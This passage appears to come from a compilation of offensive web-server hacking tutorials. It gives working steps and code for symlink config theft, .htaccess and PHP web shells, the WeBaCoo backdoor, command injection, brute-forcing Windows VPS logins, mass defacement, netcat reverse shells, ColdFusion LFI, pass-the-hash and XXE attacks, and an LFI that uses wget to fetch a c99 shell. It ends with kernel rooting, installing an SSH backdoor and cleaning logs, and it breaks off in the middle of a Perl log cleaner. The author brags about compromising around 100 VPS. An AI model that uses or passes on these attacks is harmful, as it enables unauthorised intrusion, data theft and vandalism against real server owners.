    Bypass 403 ForbiddenAnd Cant Read /Etc/Named.Config Error Now days most of the Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink . This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this . I will be posting the download link of some shells i will be using in this tutorial Best Script which can bypass cant read /ect/named.conf are : 1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files ) 2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script ) 3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files ) 4. Symlink_Sa 3.0 Automated Symlink Script . Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there Note : Its better to create a php.ini file before you do this for 100 % Result All 4 shells i have mentioned i will post the download link And i will be using a another private shell for this which i wont be giving you
  • 128.
    all for Priv8Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell . So now if we cant symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option - So now that we can easily Symlink to /Public_html/ path of each website Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit For 403 Forbidden Error i will be Using the Following Shells : 1. Dhanush Shell Coded By Arjun . ( This shell automitically creates
  • 129.
    .htaccess , php.iniand ini.php files after you login ) 2. Mannu Shell by Team Indishell Private ! . 3. Symlink_sa 3.0 Script I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told ) So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code : .htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> php.ini <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?> 1.) 403 Forbidden Error : 2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .
  • 130.
    3.) Mannu shellto Check if we Bypassed 403 Error : 4.) Bypassed 403 Forbidden and Access to Public_html/ Path Bypassed can't read /ect/named.conf and 403 forbidden Error
  • 131.
    Backdoor a WEBSERVERS WITH WEBACOO WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header’s Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the “terminal” mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. In many cases, this tool is used when a server does not have the Netcat. INSTALLATION: git clone git :/ / github.com / anestisb / WeBaCoo.git wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz . / Webacoo.pl-h COMMANDS: 1) Create obfuscated backdoor ‘backdoor.php’ with default settings: . / Webacoo.pl-g-o backdoor.php 2) Create ‘raw-backdoor.php’ backdoor de-obfuscated using the work “transit” . / Webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set “terminal” connection to the remote host using the default settings: . / Webacoo.pl-t-u http://127.0.0.1/backdoor.php
  • 132.
    4) Set “terminal”connection to the remote host to configure some arguments: . / Webacoo.pl-t-u-c http://127.0.0.1/backdoor.php “Test-Cookie”-d “TTT” 5) Set “terminal” connection to the remote host via HTTP proxy: . / Webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6) Set “terminal” connection to the remote host via HTTP proxy with basic authentication: . / Webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8:3128 7) Set “terminal” connection to the remote host via Tor and record activity: . / Webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt Now, having installed the tool and knowing the commands, we will create the backdoor to get connection to the web server from the console. For this case I obtained any server (hacked) where I’ll upload the backdoor that creare with the following command: . / Webacoo.pl-g-o backdoor.php The backdoor.php is created and placed in the folder of files (WeBaCoo), then go up the file to the server (hacked) and proceed to connect to the server with the following command: . / Webacoo.pl-t-u http://www.sitio-web.com/backdoor.php
  • 133.
    The connection tothe server is perfect, so you get very fast connection. Simple commands: In this case will place “load” to see the commands that will handle the entire server, which are: 1) MySQL-CLI: MySQL Command Line Module: mysql-cli (ex. ‘mysql-cli 10.0.1.11 admin pass’) 2) PSQL-CLI: Postgres Command Line Module:
  • 134.
    psql-cli (ex. ‘testdbpsql-cli 10.0.1.12 root pass’) 3) Upload: File Upload Module: upload (ex. ‘upload exploit.c / tmp /’) 4) Download: File Download Module: download (ex. ‘download config.php’) 5) Stealth: Stealth Enhance Module stealth (ex. ‘stealth / var / www / html’) These commands are easy to use, do a brief demonstration with MySQL-CLI command for db and connect to the server. 1) Download the configuration file: download configuration.php
  • 135.
    2) Open theconfiguration.php file copy of the MySQL user and password, you type the command: mysql-cli 127.0.0.1:3306 db_user db_password 3) The tool will connect to MySQL, we can only type show databases; to appreciate all the DB. Similarly use other commands to upload a local root exploit or download any server. Now with this tool you no longer need to have the web server or make a BackConnection Netcat often fails, to connect to a web server.
  • 136.
    Web Server Hackingthrough Command Injection Web Server Hacking through Command Injection Hello, Folks! do you know ? Command Injection is the most dangerous Web Vulnerability, its little harder to find. Command Injection is also called Command Execution, Code Injection, or Remote code execution. well it's my first post on command injection so - I'll start from basic and simple tutorial may be i'll post some advance techniques in future, depend upon my learning #Command execution is my favorite vulnerability :) What is Command Injection : Command Injection is one of the most dangerous web vulnerability which occurs due to unauthorized commands send by an attacker to Web Server and server accept it without proper client input validation which is connected to system server application and doesn't have any type of Filter or any whitelist of blocking unwanted commands, that allows an attacker to inject any command on Website Server Operating System. One simple example of Command Injection : Assume that your current Computer is Web Server and as you all know every web hosters needs an Operating system that is called server - like : Linux, Windows, Unix etc. Every website has it's own Server and Operating system which is connected to World Wide Web. Cool, now every OS have Terminal like Command Prompt in windows. Now assume that you create a web application that allows any user to ping IP then definitely you've to connect your terminal or command prompt with Web Application (Reason only OS Terminal
  • 137.
    connected to WWWcan ping any requested IP) without any user input filteration and validation your application blindly trusts on users client request and execute it on Web Server OS Terminal. So what if an attacker determine your application is vulnerable to command injection and send unauthorized commands to Server Terminal.. you know he can gain complete access to your Web Server. It's like you handed your OS terminal in an attackers hand, so of-course if you have control on OS Terminal then you can do anything on Web Server like, Shell Upload, Web Site Deface, Database takeover, creating multiple vulnerabilities, etc. Understanding Complete Command Injection : Fine, guys if you still didn't understand what exactly is command injection and how it works then here i got simple tutorial for you. Just follow the below's steps and learn Command execution in a day. Requirements : DVWA Pen-testing lab or OWASP BWA - (DVWA) Basic knowledge of Windows CMD and Linux Terminal Little Networking Knowledge Burp Suite (Not Recommended) Brain! Simple Command Execution tutorial for Beginners : I'm gonna show you simple command execution tutorial through OWASP BWA (DVWA) Pentest lab that runs on Virtual Machine, we'll execute our command on server and will able to Take down complete Website. As you know DVWA is already vulnerable to Command execution (for Pentesting) so we don't need to find it, directly determine the OS and execute commands. Now, in below image you can see that Burp Suite found server information : Click on Image to enlarge it
  • 138.
    Or, you canalso Nmap for more information : Click on Image to enlarge it If you have little knowledge of Networking you can easily understand what it is and how stuffs work, If you want to learn Networking click here. To become an expert in Command execution you've to learn Linux, Python, Perl, C and DOS Programming languages not completely but you must know about 40% to 50%. So guys back to Injection attack. Open DVWA - (Command Injection) Vulnerability, as i told you DVWA Web App allows anyone to Ping an IP that is connected with Command Prompt, (Check source code) to know how web app works. Click on Image to enlarge it Try to understand how exactly works and what we've to do to Hack Web Server. As you know complete server can be compromised via Command Prompt and Terminal. Normally we use this command to ping an IP using Command Prompt in Windows : "ping WEBSITE YOU WANT TO PING"
  • 139.
    Click on Imageto enlarge it The same DVWA Web application do, that means we're totally on Command Prompt and as you saw source code it doesn't have any type filter to filter users input and save server from Command Injection attacks. Now give a try to DVWA with one IP request to see how it works. I Pinged 127.0.0.1 IP to see how it works and it simply.. now we can use some evil mind to compromise web server with command injection. Check Vulnerability with "& ls" command. In generally method we use "ls" to get list of files and folders around the directory. Click on Image to enlarge it
  • 140.
    Now any Noobcan understand that we got complete access to web server command prompt, so easily an attacker can totally compromise server. lets try with this command "& cd ../../../../../../../../WINDOWS/system32 & dir" You'll get a big Huge page with complete directory names, files and folders you can also search for cmd.exe Click on Image to enlarge it Now how to hack complete web server and get database, and all files even we can gain root access. So just we need to upload our backdoor, Click here to learn how to upload C99 Shell PHP backdoor and Hack website using Command Execution. Thank you for reading our post, Stay tuned with us and please share it to increase us, and always feel free to comment and let me know your problem.
  • 141.
    How To HackWindows Servers Using Dubrute 2.2 Hello, Today im sharing u How to Hack Many many Windows VPS. All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS. Download Links : Vnc_scanner : Here Dubrute : Here How to Use ? 1) Download both the files from the above link. 2) Extract both the files anywhere in ur pc. 3) Open Vnc_scanner folder 4) Open the exe file called vnc_scanner_gui.exe 5) Select any Country. 6) Click on Get Dial List After the all ip list Came then :
  • 142.
    7) Click onStart Scan After that it will scan for VPS working ips.
  • 143.
    After Scan finishedclick on Start parser.It will save good ips in new text file called IPs.txt. Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of the hacking software called Dubrute. 1) Open Dubrute folder 2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder 3) Open the DUBrute.exe 4) Click on Generation 5) Check the image below.
  • 144.
    1st click onFile ip then select the text file called IPs.txt and Open 2nd Select File Login then Open and then File Pass and Open. 3rd ,Click on Make and Press Ok. Then Click on Exit Now press Start in ur Dubrute. Let it brute the combinations.When a working VPS which match IP , Username and Pass , it would be saved in Dubrute folder File called goog.txt
  • 145.
    Like dis : Inthis Image shows that I found 3 VPS which is working. Note : Both the files has Virus.Ur anti-virus detect as Trojan etc.So when u download ,if ur anti- virus active then it will delete ur files.If u want to use then u have to turn off ur anti virus.Or u can hack vps with a VPS like me.I downloaded THese files on a VPS and hacked it ;P.These soft i used to hack VPS from last 1-2 weeks.I hacked around 100 working VPS. This is a Detailed Tutorial about How to hack VPS ?.Should u have more doubt on this , feel free to reply here.am here to help u. Thanks and Good Luck to all for hack many many VPS. How to use VPS Go to Start > Run > Type mstsc and press OK Then put ur VPS ip and Connect.Then Type ur ID and pass then OK Thats it.U are into the Virtual Private Server How to Change Pass of VPS? Press Ctrl + Alt + End u will see the option for Change pass. Note : U could change pass if only u have the permission from the Administrator. Respect !
  • 146.
    Symlink Tutorial forbeginners What do you mean by Symbolic links? In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution. How to Do Symlink on Web-server ? In Symlink you need to shell access like GNY,C99,r57 etc.. on website.. It's look like this Now You need To create 1 directory with any Name like sym,test etc.... Now after Creating Directory You need 2 file 1. Blank .txt file in zip format. 2. .htaccess The txt file include this "/" and save it.. and .htaccess file include this below code: Options Indexes FollowSymLinks DirectoryIndex test.htm AddType txt .phpAddHandler txt .php and save it like ".htaccess" now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip" file using this command: "unzip "file name" " after unzip u show a txt file there. Now you need to open appropriate path in Web browser. It's look like this.
  • 147.
    Now Just Clickon 1.txt file that you unzip a zip file. After Click on 1.txt file It include all Directory's of the Web-server check out below Image: Ok done Now in Symlink we will check the Directory path like 1. /home/"Website Username"/Public_html/ 2. /hsphere/local/home/c283273/ There are Different Path Just you need to check out it. If you Click On "Home" You will get 403 Error Means Forbidden Error but never mid after you get this Error you need to add "Website Username" To find WebUsers You need to execute This command cat /etc/passwd the path is "/Home/"website username"/public_html/"
  • 148.
    After execute catcommand it's look like above image. Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE How did you find this specific Target site? you need Server Ip and www.bing.com To find Joomla,Wordpress and php site we can use this dork for it. 1. ip: 123.x.x.x index.php?option=2. ip: 123.x.x.x "Powered By WordPress" 3. ip: 123.x.x.x .php?id= and more...... Finding Target site now you need to find config file. in joomla the config file name is "configuration.php" in wordpress "wp-config.php" etc. You cannot directly see the file using like this www.Target.com/wp-config.php www.Target.com/configuration.php But when we do symlink on specific Target we can show config file using Right click and view source.. It's look like above Image This config file include site Database information like Database Name, Username, Password etc.. after getting this You can login into site data base and you can edit,delete of specific columns, fields etc.. But we need to change admin password. In many case The password is in MD5, base64 etc.. encrypted form. You need to Decrypt it... that's it. after changing the password You know what to do...!!!
  • 149.
    MASS DEFACE TUTORIAL todayi will tell you how to mass deface in few steps .. so lets start . Things Required:  Rooted server (check how to root a linux server tutorial : Here)  Mass deface script ( Download from Here password :www.hax0rtools.com ) Step By Step Guide :  First we have to download our mass deface file, so as usual we will use the wget function Type: wget www.somesite.in/massdeface.zip  As we have downloaded it in a zip file, now we will unzip it by typing Type: unzip massdeface.zip
  • 150.
     One youhave unziped it , we will now run the script by typing Type: perl massdeface.pl  Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so according to that we have to run it, but before we do so we have to download our deface page using wget . Type: wget http://www.somesite.com/index.html So once we have downloaded our deface page, now we will run the final command to mass deface . Type: perl massdeface.pl /tmp/index.html
  • 151.
    ATTACKING WEBSERVERS VIA.HTACCESS A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn't help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc). This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags are presented as is. 01 # Self contained .htaccess web shell - Part of the htshell project 02 # Written by Wireghoul - http://www.justanotherhacker.com
  • 152.
    03 04 # Overridedefault deny rule to make .htaccess file accessible over web 05 <Files ~ "^.ht"> 06 Order allow,deny 07 Allow from all 08 </Files> 09 10 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 # the apache directoves from the .htaccess file 12 AddType application/x-httpd-php .htaccess 13 14 ###### SHELL ###### <?php echo "n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ###### Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.
  • 153.
    How to Backconnectwith netcat 1.you need download this netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE 2.upload nc with shell 3.set chmod 777 for nc Quote: chmod 777 nc
  • 154.
    4.run command ./nc-vv -l -p [port] -e /bin/bash at shell Quote: ./nc -vv -l -p 4499 -e /bin/bash 5.open cmd direct to where nc save like this cd c: and run this command nc -vv [ip target] [port] Quote: C:>nc -vv ip server 4499 6.now you have back connect it
  • 155.
    Hacking Cold FusionServers - Part I Today I will go over part I of a few tricks we can use to attack Cold Fusion Servers of various versions using a few published methods. Cold Fusion is an Adobe product targeted at Enterprise and Small Business owners. Probably most commonly known for and associated with CFML or Cold Fusion Markup Language, most visually associated with .cfm files on web servers. CF platforms are built on a Java core and as such it also has some built in features which also allow command execution and database interaction. The following should present you with a few methods you can use to check for common vulnerabilities on these platforms, as well as how to exploit them. Most of these were published ages ago in 2010 but there are still many sites which are either running versions which are un-patchable or just simply running unpatched software still.... I will start this series off with the most common vulnerability first, which is the known Local File Disclosure, or LFI, in the 'locale' parameter (also referenced under: CVE-2010-2861). The LFI vulnerability allows us to read files off of the target system, without any authentication. The neat thing that makes this one different than most LFD is that if we play our cards right we can use this vulnerability as a foothold to further penetrate our target, read and see. We first try to find the admin page, as it is the most commonly vulnerable page, but certainly not the only one. You can typically find it at one of the following locations: /CFIDE/administrator/index.cfm /CFIDE/administrator/enter.cfm /CFIDE/componentutils/index.cfm /CFIDE/componentutils/login.cfmYou can determine the version of the CF Server by simply viewing the login page in most cases as the image usually contains the version graphically, like so:
  • 156.
    Knowing the versionis important as it helps us to determine the appropriate path to use to try and turn this LFD into something useful. Now if you know the full path to the CF '.properties' file then you're in business as it contains the CF admin password hashes. The list of possible paths worth trying are as follows: v6: locale=................CFusionMXlibpassword.propertiesen v7a: locale=................CFusionMX7libpassword.propertiesen v7b: locale=................optcoldfusionmx7libpassword.propertiesen v8: locale=................ColdFusion8libpassword.propertiesen vJRun: locale=....................JRun4serverscfusioncfusion- earcfusion-warWEB-INFcfusionlibpassword.propertiesenIf you have a successful injection for one of the above files, you will see the password hash(es) show up on the page you're injecting into. It will look a bit like this:
  • 157.
    NOTE: In version6 & 7 encryption is not enabled by default, although i never seen a server which did not encrypt the password in hash form. Now you can crack the password hash and login with clear text pass or we can use a little trick to bypass authentication requirements by using a pass- the-hash technique. The login form uses a bit of JavaScript magic to actually create a HMAC hash from the admin password hash and a salt value which is changed every 30 seconds. You can find this salt value by simply viewing the source code for login page, look at second occurrence of the term 'salt' or review form input details. Due to this, we pass the hash and generate the HMAC hash on our own and submit - simulating a successful login! You need to grab the salt from source:
  • 158.
    OK, so younow have Password hash and salt in hand.... Here is some code I whipped up to accomplish this task of logging in real quick for you to get the authenticated cookie. Quickly enter the needed details and run it. If successful, you will have the authenticated cookie presented to you in terminal, like so:
  • 159.
    Now once youhave the authenticated cookie, you're pretty much in. You can use your favorite cookie editor to load up the new 'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>'. Once loaded you simply refresh your browser and your now logged into the administrative panel for Cold Fusion. Now to try and get a shell up on the server.... If you already know the server path to web facing directory then you can move forward, if not you can check the 'Mappings' link on the left under 'Server Settings'. This will show a mapping of all paths for CF, by default the /CFIDE dir should be mapped giving us a usable path in the majority of cases. Mappings page looks like this:
  • 160.
    Once path isknown we will move to the 'Schedule Tasks' page located under 'Debugging & Logging' on left menu links.
  • 161.
    Now you simplypoint the task scheduler at your remote CFM/JSP shell hosted on a server you control, stored in txt format like an RFI attack payload. You can schedule for a onetime event, it will default to current time so no need to calculate things if your on different time zone :) If you need a username/password to access the remote shell file source then provide as needed in appropriate fields of task scheduler. The next is key, mark the option to 'Publish" to true so it saves the results to a file (i.e. grab our remote shell source, and save to executable). You then provide it with the full path to where you want to write to. In the majority of cases /CFIDE is writable, otherwise poke around or generate errors in SQL queries on site to get path (standard Full Path Disclosure rules still apply here). When you form is all setup you can submit to create the scheduled task.
  • 162.
    You will needto click on the green check-mark icon to run the scheduled task, which actually executes it and grabs our shell. If it has problems with remote file you will likely get a warning message of some kind in admin panel, edit and retry. Upon success, you can point your browser at the path you uploaded your shell to. In most cases Cold Fusion is running on Windows system with full NT AUTHORITY/SYSTEM privileges which means you pretty much own the local box now :)
  • 163.
    If you findthat 'cfexecute' is disabled and blocking your CFM shell from working properly, you can simply re-enable it from the admin panel since you already have access :) NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can actually determine Enterprise vs Standard by requesting a non-existant .jsp file and judging how the server responds! You have now successfully shelled a Cold Fusion Server at this point and in most cases have admin privileges to do what you want (create new user, add to admin group, add/enable RDP, enjoy new RDP). In the rare *nix instances your likely running as nobody or another non-elevated user so the usual post exploit game plan still applies if you want to takeover the whole server (i.e. root the box). Hope you enjoyed this first part of this series, second part to follow shortly....
  • 164.
    Hacking Cold FusionServers - Part II Now I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming your all set, let's begin.... Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't due proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically shoot and point with MSF and hope for the best. If the uploader is present it will try to send a multi- part upload request via POST. If successful you should be able to find a shell in '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009- 2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part..... OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:
  • 165.
    /flex2gateway/ /flex2gateway/http /flex2gateway/httpsecure /flex2gateway/cfamfpolling /flex2gateway/amf /flex2gateway/amfpolling /messagebroker/http /messagebroker/httpsecure /blazeds/messagebroker/http /blazeds/messagebroker/httpsecure /samples/messagebroker/http /samples/messagebroker/httpsecure /lcds/messagebroker/http /lcds/messagebroker/httpsecure /lcds-samples/messagebroker/http /lcds-samples/messagebroker/httpsecure You can accomplishthis with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service: "<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body </string><string>clientId</string><string>correlationId</string><string> destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLiv e</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</s tring></traits><string>nil</string><int>1</int></object><string>&x3;</ string><int>5</int><int>0</int><int>0</int></object></body></amfx> " Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read an let the requests rip, like so:
  • 166.
    Now the coolthing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...
  • 167.
    Also in additionto reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...
  • 168.
    In addition tothese named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and don’t be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.
  • 169.
    LFI exploitation viaphp://input [Shelling Sites] Hey guys, Today I'll be explaining how to shell a website using "php://input" method via LFI. So let's get started. Now let's have our target shall we. As an example, your target URL should look like this: Code: http://www.site.com/index.php?page= You can have anything similar to that as long as you can be able to read files and obtain an "include" error. First things first, give it a shot and see if you can read "/etc/passwd" URL will look like: Code: http://www.site.com/index.php?page=/etc/passwd If successful, you'll be having a page that looks like this: Clickthisbar to viewthe original image of 667x422px. Now lets try reading:
  • 170.
    Code: /proc/self/environ /proc/self/fd So URL willbecome: Code: http://www.site.com/index.php?page=/proc/self/environ http://www.site.com/index.php?page=/proc/self/fd Hmm, seemslike nothing isbeing displayed, even though I've added a null-byte at the end of the URL. Clickthisbar to viewthe original image of 651x389px. Well,notto worry,it'stime to use our back up method.The "php://input"methodwillhelpusreadfiles with certain commands, hence enables us to upload a shell. This can be done using the "Hackbar" or by using "Live HTTP headers" I'll show you how to exploit via php://input using the "Hackbar" So lets check what we're supposed to use in the Hackbar Clickthisbar to viewthe original image of 686x190px.
  • 171.
    Now let's tryputting this method in action. Look at the picture carefully. Clickthisbar to viewthe original image of 800x325px. URL will be: Code: http://www.site.com/index.php?page=php://input and POST DATA: Code: <? system('uname -a'); ?> Other commands List directories Code: <? system('ls'); ?> Identification Code: <? system('id'); ?> Convert format
  • 172.
    Code: <? system('mv file.txtfile.php'); ?> Alright, let's spawn a shell there now shall we. Grab a shell from sh3ll.org or anywhere else. For now, we'll be using the normal c99 shell Code: http://www.sh3ll.org/c99.txt? Let's use the "wget" command to spawn our shell on the site. So our POST DATA will be: Code: <? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?> This is how it's gonna look like. Clickthisbar to viewthe original image of 680x173px. Now that you've spawn a shell, you can now navigate to your shell on the site. Code: http://www.site.com/shell.php You can watch a video tutorial below so that it'll be easier to understand. Have fun.
  • 173.
    Server Rooting ViaShell and Mass defacement script Now let's kill the root: Getting Backconnectionto the server Copythe Netcat directorytoC: Opencommandprompt,type:cd C:NETCAT It'll looklike this: MicrosoftWindows[Version6.1.7600] Copyright(c) 2009 MicrosoftCorporation.All rightsreserved. C:Userskislay>cdc:netcat c:netcat> NowType:nc -l -v -p2121 It'll looklike- c:netcat>nc-l -v-p 2121 listeningon[any] 2121 ... OpenyourShell inyourbrowser,goto the backconnectiontab,if itis notthere geta shell like "B374k"or Anyother thats yourchoice. Specifyyourip& port as 2121. pressconnect,now you'll geta shell tothe server,you can give commandsto the serverthroughthatshell. Getting a Right exploit for the server Type : Uname -a & hitenter. It'll looksomethinglikethis: [admin@www.saijyotishvani.com/home/saijyoti/public_html/cgi-bin]$uname -a Linux dualxeon09.ns5.999servers.com2.6.18-194.26.1.el5#1 SMP Tue Nov9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux It showsthe kernal versionof the serveris:2.6.18-194.26.1.el5 & Year is 2010. You needto findaperfectexploitforit.youcan findthemat- # Exploit-db.com # Packetstormsecurity.org # Th3-0utl4ws.com # Leetupload.com
  • 174.
    # r00tw0rm.com Compiling &executing exploit NowI've got an exploit,&itiswritteninC. SoI can't execute itbyjustuploading. but I needtocompile it. Before proceedingfurther, Cdintothe tmpdirectory,cozitis alwayswritable.Sotype: Cd /home/XXXXX/public_html/tmp // The path can be different,replace itwithyours. So firstI'll getthe exploitonthe server,SoItype : Wgethttp://exploitsite.net/exploits/my_exploit.c // Note:There isnosuch site,I'mjust takingitto show you. It'll looksomethingLike this- [admin@www.targetsite.com/home/saijyoti/public_html/tmp]$wget http://exploitsite.net/exploits/my_exploit.c --2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c Resolvingwww.exploitsite.net...120.139.90.84 Connectingtowww.exploitsite.net|120.139.90.84|:80... connected. HTTP requestsent,awaitingresponse...200 OK Length:15088 (15K) [text/x-csrc] Savingto: `my_exploit.c' 0K .......... ....100% 189K=0.08s 2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c'saved[15088/15088] now change the permission of the exploit to 777. Type:Chmod777 my_exploit.c It may looklike: [admin@www.targetsite.com/home/targetsite/public_html/tmp]$ chmod777 ImpelDown.c Nowthe exploitisOnmyserver,I justneedtocompile &execute it. So,I'll give the command:gcc -oexploitexploit.c It'll compile &save the exploitas exploit It may looklike- [admin@www.targetsite.com/home/targetsite/public_html/tmp]$gcc-o exploitexploit.c Nextstepisto execute itSowe'll type: ./exploit It may looklike: [admin@www.targetsite.com/home/targetsite/public_html/tmp]$gcc-o ImpelDown.c
  • 175.
    Nowit saygot root.Let'sCheckis ittrue, Type: id It may look like : uid=0(saijyoti) gid=0(saijyoti) groups=0(root) WhichMeans I got root :) Installing Backdoor type : Wgeturlofbackdoor.com/sshdoor.zip Then Type : UnzipSshdoor.zip Then type : ./runpass port ^ replace passwithyourpassword,&a port. Now connectwithputty& enjoyrootprivileges.;) Methods to execute exploits written in other languages #C exploitgcc -o exploitexploit.c chmod+x exploit ./exploit #Perlperl exploit.pl #pythonpython exploit.py #phpphp exploit.php #zip unzipexploit.zip ./run Cleaning Logs # youcan use my logcleanerto clearyour track :D. It iswritteninperl.save itas anything.pl & to execute type:perl anything.pl here isthe code- [perl] #!usr/bin/perl -w#Warningsenabled! #Log cleanerversionPublic #Give CreditsWhere Needed - Kouros! #This tooktime,Hope youfuckinguse it:D #Reportbugs to info@Kouros-bl4ckhat.com #NOTE - YOU MUST BE ROOT! printqq^ #################################### # Log Cleaner3.0 PUBLIC # # Kouros#
  • 176.
